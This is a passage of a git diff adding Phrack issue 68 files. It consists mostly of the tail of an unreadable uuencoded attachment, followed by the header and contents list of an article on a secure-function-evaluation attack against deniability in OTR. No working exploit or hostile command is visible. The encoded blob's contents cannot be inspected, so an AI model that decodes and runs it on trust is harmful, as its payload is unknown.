+M*2O"5"AZ5$P38RM<X^*#=`:U@R(U+7-/I`JMF<)-\J<*6+&%M=K::`J1NFX*
+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
+,Z_7_`'E[+ET`\```
+`
+end
+
+
+--[ EOF
diff --git a/phrack68/14.txt b/phrack68/14.txt
new file mode 100644
index 0000000..c7cc0f2
--- /dev/null
+++ b/phrack68/14.txt
@@ -0,0 +1,1123 @@
+                              ==Phrack Inc.==
+
+                Volume 0x0e, Issue 0x44, Phile #0x0e of 0x13
+
+|=-----------------------------------------------------------------------=|
+|=-----------=[ Secure Function Evaluation vs. Deniability ]=------------=|
+|=------------------=[ in OTR and similar protocols ]=-------------------=|
+|=-----------------------------------------------------------------------=|
+|=-----------------------=[ greg <greg@so36.net> ]=----------------------=|
+|=-----------------------------------------------------------------------=|
+
+--[ Contents
+
+  1 - Introduction
+   1.1 - Prelude
+
+  2 - Preliminaries
+   2.1 - Diffie-Hellman
+   2.2 - RSA
+   2.3 - Oblivious Transfer
+   2.4 - Secure Function Evaluation
+
+  3 - OTR
+
+  4 - The Attack
+   4.1 - Sharing Diffie-Hellman Keys
+   4.2 - Generating MAC and Encryption Keys
